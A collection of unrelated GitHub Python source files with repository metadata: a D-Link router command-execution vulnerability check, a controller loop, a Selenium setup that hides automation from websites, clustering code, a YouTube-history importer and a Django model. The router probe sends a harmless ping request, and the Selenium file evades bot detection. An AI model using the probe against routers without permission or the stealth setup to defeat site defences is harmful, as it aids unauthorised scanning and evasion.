class router_dlink_command_exec_BaseVerify():
def __init__(self, url):
self.url = url
def run(self):
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
}
post_data = {
"act":"ping",
"dst":"www.baidu.com"
}
payload = "/diagnostic.php"
vulnurl = self.url + payload
try:
req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
if r"<report>OK" in req.text:
return "[+]存在Dlink DIAGNOSTIC.PHP命令执行漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4)
else:
return "[-]no vuln"
except:
return "[-] ======>连接超时"
if __name__ == "__main__":
testVuln = router_dlink_command_exec_BaseVerify(sys.argv[1])
testVuln.run()
|
iceyhexman/onlinetools
|
scanner/plugins/hardware/router/router_dlink_command_exec.py
|
router_dlink_command_exec.py
|
py
| 2,122 |
python
|
en
|
code
| 1,626 |
github-code
|
6
|
3200652220
|
import rodMassParam as P
import loopshape_rodMass as L
import numpy as np
class controllerLoop:
def __init__(self):
self.A_C = L.Css.A
self.B_C = L.Css.B
self.C_C = L.Css.C
self.D_C = L.Css.D
self.A_F = L.Fss.A
self.B_F = L.Fss.B
self.C_F = L.Fss.C
self.D_F = L.Fss.D
n = self.A_C.shape[0]
self.x_C = np.zeros((n, 1))
n = self.A_F.shape[0]
self.x_F = np.zeros((n, 1))
self.limit = P.tau_max
self.tau_eq = P.tau_eq
self.Ts = P.Ts
def update(self, theta_r, y):
theta = y.item(0)
#prefilter the reference command
# solve differential equation defining prefilter
if self.x_F.shape[0] == 0:
theta_c_filtered = self.D_F * theta_r
else:
N = 10 # number of Euler integration steps
for i in range(0, N):
self.x_F = self.x_F + self.Ts / N * \
(self.A_F @ self.x_F + self.B_F @ np.array([theta_r]))
# output equation for the prefilter
theta_c_filtered = self.C_F * self.x_F + self.D_F * theta_r
# error signal
error = theta_c_filtered - theta
# solve differential equation defining controller
N = 10 #number of Euler integration steps
for i in range(0, N):
self.x_C = self.x_C + self.Ts / N * \
(self.A_C @ self.x_C + self.B_C * error )
# output equation for the controller
tau_tilde = self.C_C @ self.x_C + self.D_C * error
# compute total torque
# tau = self.saturate(self.tau_eq + tau_tilde)
tau = self.tau_eq + tau_tilde
return tau.item(0)
|
mebach/me431
|
homework_template_folders/homework_template_folders/practice_final/python/controllerLoop.py
|
controllerLoop.py
|
py
| 1,736 |
python
|
en
|
code
| 0 |
github-code
|
6
|
42095434916
|
from selenium import webdriver # driver de selenium
from selenium.webdriver.chrome.service import Service
from selenium.webdriver.chrome.options import Options
from selenium_stealth import stealth # Ayuda a evitar que las webs nos detecten que somos un bot
from shutil import which
def iniciar_webdriver(headless=True):# Arranca webdriver con Chrome y lo devuelve
options = Options()
if headless:
options.add_argument("--headless") # para ejecutar chromedriver, pero sin abrir la ventana
options.add_argument("--window-size=1000,1000") # Configurar dimension ventana alto y ancho
options.add_argument("--start-maximized") # para maximizar la ventana
options.add_argument("--disable-dev-shm-usage") # Importante para usar en Heroku | Para usar un directorio temporal para crear archivos anonimos de memoria copartida
options.add_argument("--disable-blink-features=AutomationControlled") # Para que el navigator.webdriver sea falso
options.add_argument("--log-level=3") # Para que no muestre nada en la terminal
lista = [
"enable-automation", # Para ocultar "Un software automatizado de pruebas esta controlando chrome"
"enable-logging", # Para ocultar Devtools
]
options.add_experimental_option("excludeSwitches", lista)
s = Service(which("chromedriver"))
driver = webdriver.Chrome(service=s, options=options) #añadimos el argumento Options
stealth(
driver,
languages=["es-ES", "es"],
vendor="Google Inc.",
platform="Win32",
webgl_vendor="Intel Inc.",
renderer="Intel Iris OpenGL Engine",
fix_hairline=True,)
return driver
|
Jonnathan1093/Telegram-Chatbot
|
ChatHeroku/iniciar_Webdriver.py
|
iniciar_Webdriver.py
|
py
| 1,666 |
python
|
es
|
code
| 0 |
github-code
|
6
|
15200494736
|
#!/usr/bin/env python
from numpy import array
from math import sqrt
from pyspark import SparkContext
# from pyspark.mllib.clustering import KMeans, KMeansModel
from pyspark.mllib.clustering import KMeans
sc = SparkContext(appName="Kmeans Pyspark")
# Load and parse the data
data = sc.textFile("hdfs://localhost:9000/features/w2v/value_only")
parsedData = data.map(lambda line: array([float(x) for x in line.strip(' ').split(' ')]))
# Build the model (cluster the data)
clusters = KMeans.train(parsedData, 2, maxIterations=10, initializationMode="random")
# Evaluate clustering by computing Within Set Sum of Squared Errors
def error(point):
center = clusters.centers[clusters.predict(point)]
return sqrt(sum([x**2 for x in (point - center)]))
WSSSE = parsedData.map(lambda point: error(point)).reduce(lambda x, y: x + y)
print("Within Set Sum of Squared Error = " + str(WSSSE))
# Save and load model
clusters.save(sc, "hdfs://localhost:9000/kmeans/model")
# sameModel = KMeansModel.load(sc, "target/org/apache/spark/PythonKMeansExample/KMeansModel")
|
sindongboy/topinion
|
python/lda.py
|
lda.py
|
py
| 1,071 |
python
|
en
|
code
| 0 |
github-code
|
6
|
21433461529
|
import csv
import logging
import os
logger = logging.getLogger("app_logger")
# Channels with extra long videos messing up the stats and to be deleted,
# or other channels you just don't want to include.
CHANNELS_NOT_TO_IMPORT = ["4k SCREENSAVERS", "Nature Relaxation Films", "4K Relaxation Channel"]
# Some extra long videos can be deleted but in that case these channels won't be touched.
IMPORTANT_CHANNELS = ["Lex Fridman", "Andrew Huberman"]
# Insert the data from the CSV file into the database.
def insert_data_into_database(conn, c):
csv_file = os.path.abspath(os.getenv("CSV_FILE"))
with open(csv_file, "r", encoding="UTF-8-sig") as csvfile:
reader = csv.DictReader(csvfile, delimiter=";")
inserted_videos = 0
inserted_channels = 0
inserted_actions = 0
skipped_videos = 0
logger.info("Inserting data into the database...")
# Loop over each row in the CSV file.
for row in reader:
if row["Channel"] in CHANNELS_NOT_TO_IMPORT:
skipped_videos += 1
continue
c.execute("SELECT id FROM activity WHERE action = ? AND timestamp = ?",
(row["Action"], row["Timestamp"]))
activity = c.fetchone()
# If the action is already in the activity table, this is not the first time the script is run.
if activity:
continue
c.execute("SELECT id, url FROM channel WHERE url = ?", (row["Channel URL"],))
channel = c.fetchone()
# If the channel doesn"t exist, insert it into the channels table.
if not channel:
channel_name = row["Channel"].strip()
c.execute("""INSERT INTO channel (name, url)
VALUES (?, ?)""", (channel_name , row["Channel URL"],))
channel_id = c.lastrowid
inserted_channels += 1
else:
channel_id = channel[0]
if "Title" in row and "URL" in row:
c.execute("SELECT id FROM video WHERE title = ? AND url = ?", (row["Title"], row["URL"]))
video = c.fetchone()
# If the video doesn"t exist, insert it into the videos table.
if not video:
c.execute("""INSERT INTO video (title, url, channel_id)
VALUES (?, ?, ?)""", (row.get("Title", None), row["URL"], channel_id))
video_id = c.lastrowid
inserted_videos += 1
else:
video_id = video[0]
c.execute("""INSERT INTO activity (action, timestamp, video_id, channel_id)
VALUES (?, ?, ?, ?)""", (row["Action"], row["Timestamp"], video_id, channel_id))
inserted_actions += 1
conn.commit()
logger.info(f"Actions inserted: {inserted_actions}")
logger.info(f"Unique videos inserted: {inserted_videos}")
logger.info(f"Unique channels inserted: {inserted_channels}")
if skipped_videos > 0:
logger.info(f"{skipped_videos} videos skipped because channels were defined as excluded")
# Many streams are 10+ hours which mess up the watch time stats. 4 hours seemed to be a good average for me.
def delete_extra_long_videos(conn, c, max_length=4):
min_length = max_length * 3600
excluded_condition = ''
if IMPORTANT_CHANNELS:
excluded_condition = f"AND channel.name NOT IN ({','.join('?' for _ in IMPORTANT_CHANNELS)})"
else:
excluded_condition = ''
query = f"""
DELETE FROM video
WHERE id IN (
SELECT video.id
FROM video
JOIN channel ON video.channel_id = channel.id
WHERE video.length > ?
{excluded_condition}
ORDER BY video.length DESC)
"""
c.execute(query, [min_length] + IMPORTANT_CHANNELS)
conn.commit()
if c.rowcount > 0:
logger.info(f"Deleted {c.rowcount} extra long videos.")
# Delete channels that have no videos and vice versa.
def delete_orphans(conn, c):
c.execute("DELETE FROM channel WHERE id NOT IN (SELECT DISTINCT channel_id FROM video)")
rowcount = c.rowcount
c.execute("DELETE FROM activity WHERE channel_id NOT IN (SELECT id FROM channel)")
c.execute("DELETE FROM video WHERE channel_id NOT IN (SELECT id FROM channel)")
c.execute("DELETE FROM video_stat WHERE video_id NOT IN (SELECT id FROM video)")
c.execute("DELETE FROM channel_stat WHERE channel_id NOT IN (SELECT id FROM channel)")
conn.commit()
if rowcount > 0:
logger.info(f"Deleted {c.rowcount} empty channels.")
|
arilaakso/viewinginsights
|
import_data_into_db.py
|
import_data_into_db.py
|
py
| 4,855 |
python
|
en
|
code
| 0 |
github-code
|
6
|
20519700810
|
"""!
@brief Cluster analysis algorithm: X-Means
@details Implementation based on papers @cite article::xmeans::1, @cite article::xmeans::mndl
@authors Andrei Novikov ([email protected])
@date 2014-2020
@copyright BSD-3-Clause
"""
import copy
import numpy
from enum import IntEnum
from math import log
from pyclustering.cluster.encoder import type_encoding
from pyclustering.cluster.kmeans import kmeans
from pyclustering.cluster.center_initializer import kmeans_plusplus_initializer
from pyclustering.core.metric_wrapper import metric_wrapper
from pyclustering.core.wrapper import ccore_library
import pyclustering.core.xmeans_wrapper as wrapper
from pyclustering.utils import distance_metric, type_metric
class splitting_type(IntEnum):
"""!
@brief Enumeration of splitting types that can be used as splitting creation of cluster in X-Means algorithm.
"""
## Bayesian information criterion (BIC) to approximate the correct number of clusters.
## Kass's formula is used to calculate BIC:
## \f[BIC(\theta) = L(D) - \frac{1}{2}pln(N)\f]
##
## The number of free parameters \f$p\f$ is simply the sum of \f$K - 1\f$ class probabilities, \f$MK\f$ centroid coordinates, and one variance estimate:
## \f[p = (K - 1) + MK + 1\f]
##
## The log-likelihood of the data:
## \f[L(D) = n_jln(n_j) - n_jln(N) - \frac{n_j}{2}ln(2\pi) - \frac{n_jd}{2}ln(\hat{\sigma}^2) - \frac{n_j - K}{2}\f]
##
## The maximum likelihood estimate (MLE) for the variance:
## \f[\hat{\sigma}^2 = \frac{1}{N - K}\sum\limits_{j}\sum\limits_{i}||x_{ij} - \hat{C}_j||^2\f]
BAYESIAN_INFORMATION_CRITERION = 0
## Minimum noiseless description length (MNDL) to approximate the correct number of clusters @cite article::xmeans::mndl.
## Beheshti's formula is used to calculate upper bound:
## \f[Z = \frac{\sigma^2 \sqrt{2K} }{N}(\sqrt{2K} + \beta) + W - \sigma^2 + \frac{2\alpha\sigma}{\sqrt{N}}\sqrt{\frac{\alpha^2\sigma^2}{N} + W - \left(1 - \frac{K}{N}\right)\frac{\sigma^2}{2}} + \frac{2\alpha^2\sigma^2}{N}\f]
##
## where \f$\alpha\f$ and \f$\beta\f$ represent the parameters for validation probability and confidence probability.
##
## To improve clustering results some contradiction is introduced:
## \f[W = \frac{1}{n_j}\sum\limits_{i}||x_{ij} - \hat{C}_j||\f]
## \f[\hat{\sigma}^2 = \frac{1}{N - K}\sum\limits_{j}\sum\limits_{i}||x_{ij} - \hat{C}_j||\f]
MINIMUM_NOISELESS_DESCRIPTION_LENGTH = 1
class xmeans:
"""!
@brief Class represents clustering algorithm X-Means.
@details X-means clustering method starts with the assumption of having a minimum number of clusters,
and then dynamically increases them. X-means uses specified splitting criterion to control
the process of splitting clusters. Method K-Means++ can be used for calculation of initial centers.
CCORE implementation of the algorithm uses thread pool to parallelize the clustering process.
Here example how to perform cluster analysis using X-Means algorithm:
@code
from pyclustering.cluster import cluster_visualizer
from pyclustering.cluster.xmeans import xmeans
from pyclustering.cluster.center_initializer import kmeans_plusplus_initializer
from pyclustering.utils import read_sample
from pyclustering.samples.definitions import SIMPLE_SAMPLES
# Read sample 'simple3' from file.
sample = read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE3)
# Prepare initial centers - amount of initial centers defines amount of clusters from which X-Means will
# start analysis.
amount_initial_centers = 2
initial_centers = kmeans_plusplus_initializer(sample, amount_initial_centers).initialize()
# Create instance of X-Means algorithm. The algorithm will start analysis from 2 clusters, the maximum
# number of clusters that can be allocated is 20.
xmeans_instance = xmeans(sample, initial_centers, 20)
xmeans_instance.process()
# Extract clustering results: clusters and their centers
clusters = xmeans_instance.get_clusters()
centers = xmeans_instance.get_centers()
# Print total sum of metric errors
print("Total WCE:", xmeans_instance.get_total_wce())
# Visualize clustering results
visualizer = cluster_visualizer()
visualizer.append_clusters(clusters, sample)
visualizer.append_cluster(centers, None, marker='*', markersize=10)
visualizer.show()
@endcode
Visualization of clustering results that were obtained using code above and where X-Means algorithm allocates four clusters.
@image html xmeans_clustering_simple3.png "Fig. 1. X-Means clustering results (data 'Simple3')."
By default X-Means clustering algorithm uses Bayesian Information Criterion (BIC) to approximate the correct number
of clusters. There is an example where another criterion Minimum Noiseless Description Length (MNDL) is used in order
to find optimal amount of clusters:
@code
from pyclustering.cluster import cluster_visualizer
from pyclustering.cluster.xmeans import xmeans, splitting_type
from pyclustering.cluster.center_initializer import kmeans_plusplus_initializer
from pyclustering.utils import read_sample
from pyclustering.samples.definitions import FCPS_SAMPLES
# Read sample 'Target'.
sample = read_sample(FCPS_SAMPLES.SAMPLE_TARGET)
# Prepare initial centers - amount of initial centers defines amount of clusters from which X-Means will start analysis.
random_seed = 1000
amount_initial_centers = 3
initial_centers = kmeans_plusplus_initializer(sample, amount_initial_centers, random_state=random_seed).initialize()
# Create instance of X-Means algorithm with MNDL splitting criterion.
xmeans_mndl = xmeans(sample, initial_centers, 20, splitting_type=splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, random_state=random_seed)
xmeans_mndl.process()
# Extract X-Means MNDL clustering results.
mndl_clusters = xmeans_mndl.get_clusters()
# Visualize clustering results.
visualizer = cluster_visualizer(titles=['X-Means with MNDL criterion'])
visualizer.append_clusters(mndl_clusters, sample)
visualizer.show()
@endcode
@image html xmeans_clustering_mndl_target.png "Fig. 2. X-Means MNDL clustering results (data 'Target')."
As in many others algorithms, it is possible to specify metric that should be used for cluster analysis, for
example, Chebyshev distance metric:
@code
# Create instance of X-Means algorithm with Chebyshev distance metric.
chebyshev_metric = distance_metric(type_metric.CHEBYSHEV)
xmeans_instance = xmeans(sample, initial_centers, max_clusters_amount, metric=chebyshev_metric).process()
@endcode
@see center_initializer
"""
def __init__(self, data, initial_centers=None, kmax=20, tolerance=0.001, criterion=splitting_type.BAYESIAN_INFORMATION_CRITERION, ccore=True, **kwargs):
"""!
@brief Constructor of clustering algorithm X-Means.
@param[in] data (array_like): Input data that is presented as list of points (objects), each point should be represented by list or tuple.
@param[in] initial_centers (list): Initial coordinates of centers of clusters that are represented by list: `[center1, center2, ...]`,
if it is not specified then X-Means starts from the random center.
@param[in] kmax (uint): Maximum number of clusters that can be allocated.
@param[in] tolerance (double): Stop condition for each iteration: if maximum value of change of centers of clusters is less than tolerance than algorithm will stop processing.
@param[in] criterion (splitting_type): Type of splitting creation (by default `splitting_type.BAYESIAN_INFORMATION_CRITERION`).
@param[in] ccore (bool): Defines if C++ pyclustering library should be used instead of Python implementation.
@param[in] **kwargs: Arbitrary keyword arguments (available arguments: `repeat`, `random_state`, `metric`, `alpha`, `beta`).
<b>Keyword Args:</b><br>
- repeat (unit): How many times K-Means should be run to improve parameters (by default is `1`).
With larger `repeat` values suggesting higher probability of finding global optimum.
- random_state (int): Seed for random state (by default is `None`, current system time is used).
- metric (distance_metric): Metric that is used for distance calculation between two points (by default
euclidean square distance).
- alpha (double): Parameter distributed [0.0, 1.0] for alpha probabilistic bound \f$Q\left(\alpha\right)\f$.
The parameter is used only in case of MNDL splitting criterion, in all other cases this value is ignored.
- beta (double): Parameter distributed [0.0, 1.0] for beta probabilistic bound \f$Q\left(\beta\right)\f$.
The parameter is used only in case of MNDL splitting criterion, in all other cases this value is ignored.
"""
self.__pointer_data = numpy.array(data)
self.__clusters = []
self.__random_state = kwargs.get('random_state', None)
self.__metric = copy.copy(kwargs.get('metric', distance_metric(type_metric.EUCLIDEAN_SQUARE)))
if initial_centers is not None:
self.__centers = numpy.array(initial_centers)
else:
self.__centers = kmeans_plusplus_initializer(data, 2, random_state=self.__random_state).initialize()
self.__kmax = kmax
self.__tolerance = tolerance
self.__criterion = criterion
self.__total_wce = 0.0
self.__repeat = kwargs.get('repeat', 1)
self.__alpha = kwargs.get('alpha', 0.9)
self.__beta = kwargs.get('beta', 0.9)
self.__ccore = ccore and self.__metric.get_type() != type_metric.USER_DEFINED
if self.__ccore is True:
self.__ccore = ccore_library.workable()
self.__verify_arguments()
def process(self):
"""!
@brief Performs cluster analysis in line with rules of X-Means algorithm.
@return (xmeans) Returns itself (X-Means instance).
@see get_clusters()
@see get_centers()
"""
if self.__ccore is True:
self.__process_by_ccore()
else:
self.__process_by_python()
return self
def __process_by_ccore(self):
"""!
@brief Performs cluster analysis using CCORE (C/C++ part of pyclustering library).
"""
ccore_metric = metric_wrapper.create_instance(self.__metric)
result = wrapper.xmeans(self.__pointer_data, self.__centers, self.__kmax, self.__tolerance, self.__criterion,
self.__alpha, self.__beta, self.__repeat, self.__random_state,
ccore_metric.get_pointer())
self.__clusters = result[0]
self.__centers = result[1]
self.__total_wce = result[2][0]
def __process_by_python(self):
"""!
@brief Performs cluster analysis using python code.
"""
self.__clusters = []
while len(self.__centers) <= self.__kmax:
current_cluster_number = len(self.__centers)
self.__clusters, self.__centers, _ = self.__improve_parameters(self.__centers)
allocated_centers = self.__improve_structure(self.__clusters, self.__centers)
if current_cluster_number == len(allocated_centers):
break
else:
self.__centers = allocated_centers
self.__clusters, self.__centers, self.__total_wce = self.__improve_parameters(self.__centers)
def predict(self, points):
"""!
@brief Calculates the closest cluster to each point.
@param[in] points (array_like): Points for which closest clusters are calculated.
@return (list) List of closest clusters for each point. Each cluster is denoted by index. Return empty
collection if 'process()' method was not called.
An example how to calculate (or predict) the closest cluster to specified points.
@code
from pyclustering.cluster.xmeans import xmeans
from pyclustering.samples.definitions import SIMPLE_SAMPLES
from pyclustering.utils import read_sample
# Load list of points for cluster analysis.
sample = read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE3)
# Initial centers for sample 'Simple3'.
initial_centers = [[0.2, 0.1], [4.0, 1.0], [2.0, 2.0], [2.3, 3.9]]
# Create instance of X-Means algorithm with prepared centers.
xmeans_instance = xmeans(sample, initial_centers)
# Run cluster analysis.
xmeans_instance.process()
# Calculate the closest cluster to following two points.
points = [[0.25, 0.2], [2.5, 4.0]]
closest_clusters = xmeans_instance.predict(points)
print(closest_clusters)
@endcode
"""
nppoints = numpy.array(points)
if len(self.__clusters) == 0:
return []
self.__metric.enable_numpy_usage()
npcenters = numpy.array(self.__centers)
differences = numpy.zeros((len(nppoints), len(npcenters)))
for index_point in range(len(nppoints)):
differences[index_point] = self.__metric(nppoints[index_point], npcenters)
self.__metric.disable_numpy_usage()
return numpy.argmin(differences, axis=1)
def get_clusters(self):
"""!
@brief Returns list of allocated clusters, each cluster contains indexes of objects in list of data.
@return (list) List of allocated clusters.
@see process()
@see get_centers()
@see get_total_wce()
"""
return self.__clusters
def get_centers(self):
"""!
@brief Returns list of centers for allocated clusters.
@return (list) List of centers for allocated clusters.
@see process()
@see get_clusters()
@see get_total_wce()
"""
return self.__centers
def get_cluster_encoding(self):
"""!
@brief Returns clustering result representation type that indicate how clusters are encoded.
@return (type_encoding) Clustering result representation.
@see get_clusters()
"""
return type_encoding.CLUSTER_INDEX_LIST_SEPARATION
def get_total_wce(self):
"""!
@brief Returns sum of Euclidean Squared metric errors (SSE - Sum of Squared Errors).
@details Sum of metric errors is calculated using distance between point and its center:
\f[error=\sum_{i=0}^{N}euclidean_square_distance(x_{i}-center(x_{i}))\f]
@see process()
@see get_clusters()
"""
return self.__total_wce
def __search_optimial_parameters(self, local_data):
"""!
@brief Split data of the region into two cluster and tries to find global optimum by running k-means clustering
several times (defined by 'repeat' argument).
@param[in] local_data (list): Points of a region that should be split into two clusters.
@return (tuple) List of allocated clusters, list of centers and total WCE (clusters, centers, wce).
"""
optimal_wce, optimal_centers, optimal_clusters = float('+inf'), None, None
for _ in range(self.__repeat):
candidates = 5
if len(local_data) < candidates:
candidates = len(local_data)
local_centers = kmeans_plusplus_initializer(local_data, 2, candidates, random_state=self.__random_state).initialize()
kmeans_instance = kmeans(local_data, local_centers, tolerance=self.__tolerance, ccore=False, metric=self.__metric)
kmeans_instance.process()
local_wce = kmeans_instance.get_total_wce()
if local_wce < optimal_wce:
optimal_centers = kmeans_instance.get_centers()
optimal_clusters = kmeans_instance.get_clusters()
optimal_wce = local_wce
return optimal_clusters, optimal_centers, optimal_wce
def __improve_parameters(self, centers, available_indexes=None):
"""!
@brief Performs k-means clustering in the specified region.
@param[in] centers (list): Cluster centers, if None then automatically generated two centers using center initialization method.
@param[in] available_indexes (list): Indexes that defines which points can be used for k-means clustering, if None then all points are used.
@return (tuple) List of allocated clusters, list of centers and total WCE (clusters, centers, wce).
"""
if available_indexes and len(available_indexes) == 1:
index_center = available_indexes[0]
return [available_indexes], self.__pointer_data[index_center], 0.0
local_data = self.__pointer_data
if available_indexes:
local_data = [self.__pointer_data[i] for i in available_indexes]
local_centers = centers
if centers is None:
clusters, local_centers, local_wce = self.__search_optimial_parameters(local_data)
else:
kmeans_instance = kmeans(local_data, local_centers, tolerance=self.__tolerance, ccore=False, metric=self.__metric).process()
local_wce = kmeans_instance.get_total_wce()
local_centers = kmeans_instance.get_centers()
clusters = kmeans_instance.get_clusters()
if available_indexes:
clusters = self.__local_to_global_clusters(clusters, available_indexes)
return clusters, local_centers, local_wce
def __local_to_global_clusters(self, local_clusters, available_indexes):
"""!
@brief Converts clusters in local region define by 'available_indexes' to global clusters.
@param[in] local_clusters (list): Local clusters in specific region.
@param[in] available_indexes (list): Map between local and global point's indexes.
@return Global clusters.
"""
clusters = []
for local_cluster in local_clusters:
current_cluster = []
for index_point in local_cluster:
current_cluster.append(available_indexes[index_point])
clusters.append(current_cluster)
return clusters
def __improve_structure(self, clusters, centers):
"""!
@brief Check for best structure: divides each cluster into two and checks for best results using splitting criterion.
@param[in] clusters (list): Clusters that have been allocated (each cluster contains indexes of points from data).
@param[in] centers (list): Centers of clusters.
@return (list) Allocated centers for clustering.
"""
allocated_centers = []
amount_free_centers = self.__kmax - len(centers)
for index_cluster in range(len(clusters)):
# solve k-means problem for children where data of parent are used.
(parent_child_clusters, parent_child_centers, _) = self.__improve_parameters(None, clusters[index_cluster])
# If it's possible to split current data
if len(parent_child_clusters) > 1:
# Calculate splitting criterion
parent_scores = self.__splitting_criterion([clusters[index_cluster]], [centers[index_cluster]])
child_scores = self.__splitting_criterion([parent_child_clusters[0], parent_child_clusters[1]], parent_child_centers)
split_require = False
# Reallocate number of centers (clusters) in line with scores
if self.__criterion == splitting_type.BAYESIAN_INFORMATION_CRITERION:
if parent_scores < child_scores:
split_require = True
elif self.__criterion == splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH:
# If its score for the split structure with two children is smaller than that for the parent structure,
# then representing the data samples with two clusters is more accurate in comparison to a single parent cluster.
if parent_scores > child_scores:
split_require = True
if (split_require is True) and (amount_free_centers > 0):
allocated_centers.append(parent_child_centers[0])
allocated_centers.append(parent_child_centers[1])
amount_free_centers -= 1
else:
allocated_centers.append(centers[index_cluster])
else:
allocated_centers.append(centers[index_cluster])
return allocated_centers
def __splitting_criterion(self, clusters, centers):
"""!
@brief Calculates splitting criterion for input clusters.
@param[in] clusters (list): Clusters for which splitting criterion should be calculated.
@param[in] centers (list): Centers of the clusters.
@return (double) Returns splitting criterion. High value of splitting criterion means that current structure is
much better.
@see __bayesian_information_criterion(clusters, centers)
@see __minimum_noiseless_description_length(clusters, centers)
"""
if self.__criterion == splitting_type.BAYESIAN_INFORMATION_CRITERION:
return self.__bayesian_information_criterion(clusters, centers)
elif self.__criterion == splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH:
return self.__minimum_noiseless_description_length(clusters, centers)
else:
assert 0
def __minimum_noiseless_description_length(self, clusters, centers):
"""!
@brief Calculates splitting criterion for input clusters using minimum noiseless description length criterion.
@param[in] clusters (list): Clusters for which splitting criterion should be calculated.
@param[in] centers (list): Centers of the clusters.
@return (double) Returns splitting criterion in line with bayesian information criterion.
Low value of splitting cretion means that current structure is much better.
@see __bayesian_information_criterion(clusters, centers)
"""
score = float('inf')
W = 0.0
K = len(clusters)
N = 0.0
sigma_square = 0.0
alpha = self.__alpha
alpha_square = alpha * alpha
beta = self.__beta
for index_cluster in range(0, len(clusters), 1):
Ni = len(clusters[index_cluster])
if Ni == 0:
return float('inf')
Wi = 0.0
for index_object in clusters[index_cluster]:
Wi += self.__metric(self.__pointer_data[index_object], centers[index_cluster])
sigma_square += Wi
W += Wi / Ni
N += Ni
if N - K > 0:
sigma_square /= (N - K)
sigma = sigma_square ** 0.5
Kw = (1.0 - K / N) * sigma_square
Ksa = (2.0 * alpha * sigma / (N ** 0.5)) * (alpha_square * sigma_square / N + W - Kw / 2.0) ** 0.5
UQa = W - Kw + 2.0 * alpha_square * sigma_square / N + Ksa
score = sigma_square * K / N + UQa + sigma_square * beta * ((2.0 * K) ** 0.5) / N
return score
def __bayesian_information_criterion(self, clusters, centers):
"""!
@brief Calculates splitting criterion for input clusters using bayesian information criterion.
@param[in] clusters (list): Clusters for which splitting criterion should be calculated.
@param[in] centers (list): Centers of the clusters.
@return (double) Splitting criterion in line with bayesian information criterion.
High value of splitting criterion means that current structure is much better.
@see __minimum_noiseless_description_length(clusters, centers)
"""
scores = [float('inf')] * len(clusters) # splitting criterion
dimension = len(self.__pointer_data[0])
# estimation of the noise variance in the data set
sigma_sqrt = 0.0
K = len(clusters)
N = 0.0
for index_cluster in range(0, len(clusters), 1):
for index_object in clusters[index_cluster]:
sigma_sqrt += self.__metric(self.__pointer_data[index_object], centers[index_cluster])
N += len(clusters[index_cluster])
if N - K > 0:
sigma_sqrt /= (N - K)
p = (K - 1) + dimension * K + 1
# in case of the same points, sigma_sqrt can be zero (issue: #407)
sigma_multiplier = 0.0
if sigma_sqrt <= 0.0:
sigma_multiplier = float('-inf')
else:
sigma_multiplier = dimension * 0.5 * log(sigma_sqrt)
# splitting criterion
for index_cluster in range(0, len(clusters), 1):
n = len(clusters[index_cluster])
L = n * log(n) - n * log(N) - n * 0.5 * log(2.0 * numpy.pi) - n * sigma_multiplier - (n - K) * 0.5
# BIC calculation
scores[index_cluster] = L - p * 0.5 * log(N)
return sum(scores)
def __verify_arguments(self):
"""!
@brief Verify input parameters for the algorithm and throw exception in case of incorrectness.
"""
if len(self.__pointer_data) == 0:
raise ValueError("Input data is empty (size: '%d')." % len(self.__pointer_data))
if len(self.__centers) == 0:
raise ValueError("Initial centers are empty (size: '%d')." % len(self.__pointer_data))
if self.__tolerance < 0:
raise ValueError("Tolerance (current value: '%d') should be greater or equal to 0." %
self.__tolerance)
if self.__repeat <= 0:
raise ValueError("Repeat (current value: '%d') should be greater than 0." %
self.__repeat)
if self.__alpha < 0.0 or self.__alpha > 1.0:
raise ValueError("Parameter for the probabilistic bound Q(alpha) should in the following range [0, 1] "
"(current value: '%f')." % self.__alpha)
if self.__beta < 0.0 or self.__beta > 1.0:
raise ValueError("Parameter for the probabilistic bound Q(beta) should in the following range [0, 1] "
"(current value: '%f')." % self.__beta)
|
annoviko/pyclustering
|
pyclustering/cluster/xmeans.py
|
xmeans.py
|
py
| 28,247 |
python
|
en
|
code
| 1,113 |
github-code
|
6
|
41675770750
|
# 미로만들기
import sys
import heapq
input = sys.stdin.readline
N = int(input())
# 미로 생성
maze = [list(map(int, list(input().rstrip()))) for _ in range(N)]
# 미로를 탐색할 큐를 생성
queue = [[0, 0, 0]]
# 방문처리할 리스트 NxN
visited = [[False for _ in range(N)] for _ in range(N)]
# 상하좌우 4방향
direction = [(1, 0), (0, -1), (-1, 0), (0, 1)]
while queue:
cost, r, c = heapq.heappop(queue)
# 도착지면 출력 후 프로그램 종료
if r == N - 1 and c == N - 1:
print(cost)
exit(0)
# 상하좌우 4방향 탐색 (인덱스 초과, 방문 했는지 검사)
for d in direction:
next_r = r + d[0]
next_c = c + d[1]
if 0 <= next_r < N and 0 <= next_c < N and not visited[next_r][next_c]:
# 흰 방, 검은 방 종류에 따라 가중치 0 or 1로 설정
next_cost = 0 if maze[next_r][next_c] == 1 else 1
visited[next_r][next_c] = True
heapq.heappush(queue, [cost + next_cost, next_r, next_c])
|
jisupark123/Python-Coding-Test
|
알쓰/week3/2665.py
|
2665.py
|
py
| 1,049 |
python
|
ko
|
code
| 1 |
github-code
|
6
|
33353045212
|
from django.contrib.auth.models import User
from django.db import models
# Create your models here.
from django.db.models.signals import pre_delete
from django.dispatch import receiver
class CommonInfo(models.Model):
# 开始时间 auto_now_add=True,
startday = models.DateField(verbose_name="下单时间", null=True)
# 结束时间
endday = models.DateField(verbose_name="交货时间", null=True)
# 备注
remark = models.TextField(default="", verbose_name="备注")
status_choice = (
('pending', "未开始"),
('process', "进行中"),
('finish', "已完成")
)
status = models.CharField(
max_length=10,
choices=status_choice,
default='pending',
verbose_name="订单状态",
)
class Meta:
abstract = True
class Productplan(CommonInfo):
# 订单号
orderid = models.CharField(max_length=10, verbose_name="订单号")
# 订单分类
category_choice = (
('std', "标准"),
('unstd', "非标")
)
category = models.CharField(
max_length=5,
choices=category_choice,
default='std',
verbose_name="订单类型",
)
# 型号
productid = models.CharField(max_length=20, verbose_name="产品型号")
# 序列号
serial = models.CharField(max_length=20, verbose_name="序列号")
# 用户
customer = models.CharField(max_length=20, verbose_name="用户")
# 配置单
conffile = models.FileField(upload_to='service_files/%Y%m%d/', blank=True)
# 更新时间
updated = models.DateTimeField(auto_now=True)
def __str__(self):
return self.customer + "_SN" + self.serial
class Meta:
ordering = ('-updated',)
verbose_name_plural = "订单管理"
@receiver(pre_delete, sender=Productplan)
